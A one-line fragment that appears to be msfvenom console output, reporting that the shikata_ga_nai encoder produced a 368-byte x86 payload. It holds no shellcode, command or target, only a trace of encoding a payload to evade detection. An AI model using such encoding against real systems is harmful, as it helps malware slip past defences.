# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1) #